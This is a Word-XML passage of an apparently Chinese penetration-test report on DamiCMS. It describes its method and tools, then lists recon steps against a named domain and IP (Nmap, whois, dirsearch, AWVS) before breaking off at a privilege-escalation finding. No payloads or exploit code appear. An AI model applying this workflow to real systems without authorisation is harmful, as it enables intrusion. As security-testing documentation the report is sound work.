        <w:t>随着互联网技术的快速发展，Web应用在各行业中的使用日益广泛，但同时也面临着严峻的安全威胁。SQL注入、跨站脚本（XSS）、跨站请求伪造（CSRF）、文件上传漏洞等安全问题频发，给企业和用户带来严重的数据泄露和财产损失风险。尽管已有防火墙、WAF（Web应用防火墙）等防护措施，但攻击者的手段不断演进，传统的防御方式难以全面应对。因此，通过渗透测试主动发现Web应用的安全漏洞，并提出有效的修复方案，对提升系统安全性具有重要意义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="284" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc22817"/>
      <w:bookmarkStart w:id="32" w:name="_Toc137205494"/>
      <w:bookmarkStart w:id="33" w:name="_Toc137206726"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>本课题的研究方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>本课题采用黑盒测试与白盒测试相结合的方式，对目标Web应用进行系统化的渗透测试研究，具体方法如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    信息收集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使用Nmap、Whois、Shodan等工具探测目标系统的开放端口、服务版本及架构信息。通过Burp Suite、OWASP ZAP抓包分析HTTP请求，识别潜在的攻击面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞扫描与手动验证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使用自动化工具（如AWVS、Nessus）进行初步扫描，发现常见漏洞（如SQL注入、XSS）。结合手动测试（如修改HTTP参数、尝试Payload绕过WAF）验证漏洞的可利用性，避免误报。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    漏洞利用与权限提升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对发现的漏洞进行深入利用，如通过SQL注入获取数据库信息、利用文件上传漏洞获取WebShell等。在授权范围内尝试内网渗透，测试横向移动的可能性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="240"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    报告撰写与修复建议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</w:rPr>
        <w:t>整理测试过程中的漏洞细节，提供复现步骤和风险等级评估。针对每个漏洞提出具体的修复方案（如输入过滤、CSP策略、权限控制等）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="240"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:ind w:left="210" w:firstLine="301"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc136351673"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkStart w:id="35" w:name="_Toc136927416"/>
      <w:bookmarkEnd w:id="35"/>
      <w:bookmarkStart w:id="36" w:name="_Toc136420591"/>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkStart w:id="37" w:name="_Toc136592284"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkStart w:id="38" w:name="_Toc136410270"/>
      <w:bookmarkEnd w:id="38"/>
      <w:bookmarkStart w:id="39" w:name="_Toc137205495"/>
      <w:bookmarkEnd w:id="39"/>
      <w:bookmarkStart w:id="40" w:name="_Toc136351491"/>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkStart w:id="41" w:name="_Toc137206727"/>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkStart w:id="42" w:name="_Toc136593659"/>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkStart w:id="43" w:name="_Toc136593414"/>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkStart w:id="44" w:name="_Toc137206728"/>
      <w:bookmarkStart w:id="45" w:name="_Toc137205496"/>
      <w:bookmarkStart w:id="46" w:name="_Toc9861"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>.相关技术和工具简介</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="281"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc16336"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>b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urpsuite</w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:leftChars="200" w:firstLine="480" w:firstLineChars="200"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Toc29047"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Burp Suite 是由PortSwigger公司开发的一款集成化Web应用安全测试平台，广泛用于渗透测试、漏洞挖掘和安全研究。作为行业标杆工具，它提供了一套完整的解决方案，涵盖从信息收集到漏洞利用的全流程。核心模块包括代理拦截（Proxy）、漏洞扫描器（Scanner）、爬虫（Spider）、中继攻击工具（Repeater）、序列生成器（Sequencer）以及扩展插件（Extender），支持通过自定义插件（BApps）扩展功能。其智能代理可拦截和修改HTTP/S请求，配合历史记录和靶场（Target）功能实现高效流量分析。专业版独有的主动/被动扫描引擎能自动检测SQL注入、XSS等130+漏洞类型，并生成合规报告。独特优势在于高度可定制化，支持Macro宏录制解决复杂身份验证场景，Collaborator模块还能协助发现盲注类漏洞。社区版虽功能受限，但仍是安全从业者的必备工具，与ZAP等开源工具相比，其在企业级测试场景中展现出更成熟的流量处理和漏洞检测能力。持续更新的BApp商店和活跃社区生态使其始终保持在Web安全测试领域的技术前沿。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="210" w:firstLine="281"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts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大米cms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc7704"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>大米CMS是一款基于PHP+MySQL开发的开源内容管理系统，主打轻量、高效和易用性，适合中小型网站建设。系统采用MVC架构设计，支持多模板切换、静态页面生成和SEO优化功能，内置文章、图片、下载等常见模块，并提供会员管理、权限控制等基础功能。其特色在于简洁的后台操作界面和低学习成本，同时支持插件扩展机制，允许开发者自定义功能模块。虽然生态规模不及Discuz等主流CMS，但凭借代码开源、运行资源占用少等优势，在个人站长和快速建站场景中仍有一定用户群体。最新版本已适配移动端响应式布局，并强化了安全防护机制。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.工具准备</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="448" w:leftChars="0" w:firstLine="240" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="133"/>
      <w:bookmarkStart w:id="50" w:name="_Toc137206736"/>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkStart w:id="51" w:name="_Toc136351697"/>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkStart w:id="52" w:name="_Toc137206754"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkStart w:id="53" w:name="_Toc136927438"/>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkStart w:id="54" w:name="_Toc136592306"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkStart w:id="55" w:name="_Toc136593440"/>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkStart w:id="56" w:name="_Toc136410291"/>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkStart w:id="57" w:name="_Toc136351515"/>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkStart w:id="58" w:name="_Toc136592300"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkStart w:id="59" w:name="_Toc136351679"/>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkStart w:id="60" w:name="_Toc136593442"/>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkStart w:id="61" w:name="_Toc136927442"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkStart w:id="62" w:name="_Toc136420616"/>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkStart w:id="63" w:name="_Toc136593685"/>
      <w:bookmarkEnd w:id="63"/>
      <w:bookmarkStart w:id="64" w:name="_Toc137205522"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkStart w:id="65" w:name="_Toc136420612"/>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkStart w:id="66" w:name="_Toc136592289"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkStart w:id="67" w:name="_Toc137205512"/>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkStart w:id="68" w:name="_Toc136592291"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkStart w:id="69" w:name="_Toc136927432"/>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkStart w:id="70" w:name="_Toc136420598"/>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkStart w:id="71" w:name="_Toc137205500"/>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkStart w:id="72" w:name="_Toc136410275"/>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkStart w:id="73" w:name="_Toc136592310"/>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkStart w:id="74" w:name="_Toc137206734"/>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkStart w:id="75" w:name="_Toc137206750"/>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkStart w:id="76" w:name="_Toc136420596"/>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkStart w:id="77" w:name="_Toc136927421"/>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkStart w:id="78" w:name="_Toc136593666"/>
      <w:bookmarkEnd w:id="78"/>
      <w:bookmarkStart w:id="79" w:name="_Toc137205502"/>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkStart w:id="80" w:name="_Toc137205524"/>
      <w:bookmarkEnd w:id="80"/>
      <w:bookmarkStart w:id="81" w:name="_Toc137206756"/>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkStart w:id="82" w:name="_Toc136593419"/>
      <w:bookmarkEnd w:id="82"/>
      <w:bookmarkStart w:id="83" w:name="_Toc136351693"/>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkStart w:id="84" w:name="_Toc136593687"/>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkStart w:id="85" w:name="_Toc136593430"/>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkStart w:id="86" w:name="_Toc137206744"/>
      <w:bookmarkEnd w:id="86"/>
      <w:bookmarkStart w:id="87" w:name="_Toc136593421"/>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkStart w:id="88" w:name="_Toc137205518"/>
      <w:bookmarkEnd w:id="88"/>
      <w:bookmarkStart w:id="89" w:name="_Toc136927444"/>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkStart w:id="90" w:name="_Toc136593664"/>
      <w:bookmarkEnd w:id="90"/>
      <w:bookmarkStart w:id="91" w:name="_Toc136410295"/>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkStart w:id="92" w:name="_Toc136593436"/>
      <w:bookmarkEnd w:id="92"/>
      <w:bookmarkStart w:id="93" w:name="_Toc136410277"/>
      <w:bookmarkEnd w:id="93"/>
      <w:bookmarkStart w:id="94" w:name="_Toc136593675"/>
      <w:bookmarkEnd w:id="94"/>
      <w:bookmarkStart w:id="95" w:name="_Toc136351511"/>
      <w:bookmarkEnd w:id="95"/>
      <w:bookmarkStart w:id="96" w:name="_Toc137206732"/>
      <w:bookmarkEnd w:id="96"/>
      <w:bookmarkStart w:id="97" w:name="_Toc136351497"/>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkStart w:id="98" w:name="_Toc136927423"/>
      <w:bookmarkEnd w:id="98"/>
      <w:bookmarkStart w:id="99" w:name="_Toc136593681"/>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkStart w:id="100" w:name="_Toc137205504"/>
      <w:bookmarkEnd w:id="100"/>
      <w:bookmarkStart w:id="101" w:name="_Toc136592312"/>
      <w:bookmarkEnd w:id="101"/>
      <w:bookmarkStart w:id="102" w:name="_Toc171184830"/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/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>burpsuite，并开始监听</w:t>
      </w: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/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="448" w:leftChars="0" w:firstLine="240" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="2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436880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-2997200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5276850" cy="3192145"/>
            <wp:effectExtent l="0" t="0" r="11430" b="825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wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="448" w:leftChars="0" w:firstLine="240" w:firstLineChars="0"/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火狐开启代理</w:t>
      </w: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wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:jc w:val="both"/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wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="688" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-S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436880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1397000</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5271770" cy="1587500"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1270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wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="688" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:bCs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wordWrap w:val="0"/>
        <w:spacing w:line="400" w:lineRule="exact"/>
        <w:ind w:left="688" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc13860"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.信息搜集</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/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域名：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eastAsia="zh"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://blog.simple-wh.top/dami_5.4/" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh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eastAsia="zh"/>
        </w:rPr>
        <w:t>http://blog.simple-wh.top/dami_5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang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/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322707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得到ip地址为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang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eastAsia="zh"/>
        </w:rPr>
        <w:t>7.109.55.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>25</w:t>
      </w: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查询有无cdn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7960" cy="1748155"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="9955463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4631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只有一个子域：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325818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Whois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928110"/>
            <wp:effectExtent l="0" t="0" r="381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备案信息：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064510"/>
            <wp:effectExtent l="0" t="0" r="381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查旁站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3806825"/>
            <wp:effectExtent l="0" t="0" r="635" b="3175"/>
            <wp:docPr id="228690295" name="图片 228690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90295" name="图片 22869029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Nmap扫描：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2705735"/>
            <wp:effectExtent l="0" t="0" r="14605" b="6985"/>
            <wp:docPr id="12887094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0946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通过dirsearch扫描目录：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2893695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1435427387" name="图片 1435427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27387" name="图片 1435427387"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect t="296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用wappalyzer指纹识别信息收集</w:t>
      </w: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320040</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>43815</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4739640" cy="3474085"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21509"/>
                <wp:lineTo x="21531" y="21509"/>
                <wp:lineTo x="21531" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="350101842" name="图片 35010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01842" name="图片 350101842"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect t="13624" b="1952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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh"/>
        </w:rPr>
        <w:t>用awvs扫描一下网站：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="44"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val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2118360"/>
            <wp:effectExtent l="0" t="0" r="14605" b="0"/>
            <wp:docPr id="923608609" name="图片 923608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08609" name="图片 92360860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4"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="both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2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc28270"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.风险细节描述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
      <w:bookmarkStart w:id="105" w:name="_Toc24827"/>
    </w:p>
    <w:bookmarkEnd w:id="105"/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outlineLvl w:val="1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bookmarkStart w:id="106" w:name="_Toc136593450"/>
      <w:bookmarkEnd w:id="106"/>
      <w:bookmarkStart w:id="107" w:name="_Toc136420622"/>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkStart w:id="108" w:name="_Toc136593693"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkStart w:id="109" w:name="_Toc136592318"/>
      <w:bookmarkEnd w:id="109"/>
      <w:bookmarkStart w:id="110" w:name="_Toc137205530"/>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkStart w:id="111" w:name="_Toc136927448"/>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkStart w:id="112" w:name="_Toc136927450"/>
      <w:bookmarkEnd w:id="112"/>
      <w:bookmarkStart w:id="113" w:name="_Toc136592320"/>
      <w:bookmarkEnd w:id="113"/>
      <w:bookmarkStart w:id="114" w:name="_Toc137205528"/>
      <w:bookmarkEnd w:id="114"/>
      <w:bookmarkStart w:id="115" w:name="_Toc136593448"/>
      <w:bookmarkEnd w:id="115"/>
      <w:bookmarkStart w:id="116" w:name="_Toc136593695"/>
      <w:bookmarkEnd w:id="116"/>
      <w:bookmarkStart w:id="117" w:name="_Toc137206764"/>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkStart w:id="118" w:name="_Toc136410301"/>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkStart w:id="119" w:name="_Toc137205532"/>
      <w:bookmarkEnd w:id="119"/>
      <w:bookmarkStart w:id="120" w:name="_Toc136927452"/>
      <w:bookmarkEnd w:id="120"/>
      <w:bookmarkStart w:id="121" w:name="_Toc136593446"/>
      <w:bookmarkEnd w:id="121"/>
      <w:bookmarkStart w:id="122" w:name="_Toc136592316"/>
      <w:bookmarkEnd w:id="122"/>
      <w:bookmarkStart w:id="123" w:name="_Toc137206760"/>
      <w:bookmarkEnd w:id="123"/>
      <w:bookmarkStart w:id="124" w:name="_Toc136420624"/>
      <w:bookmarkEnd w:id="124"/>
      <w:bookmarkStart w:id="125" w:name="_Toc137206762"/>
      <w:bookmarkEnd w:id="125"/>
      <w:bookmarkStart w:id="126" w:name="_Toc136593691"/>
      <w:bookmarkEnd w:id="126"/>
      <w:bookmarkStart w:id="127" w:name="_Toc9160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5.1 越权漏洞（漏洞级别：高）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/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damicms网站存在逻辑越权漏洞，攻击者可能通过该漏洞进行攻击。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漏洞地址：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
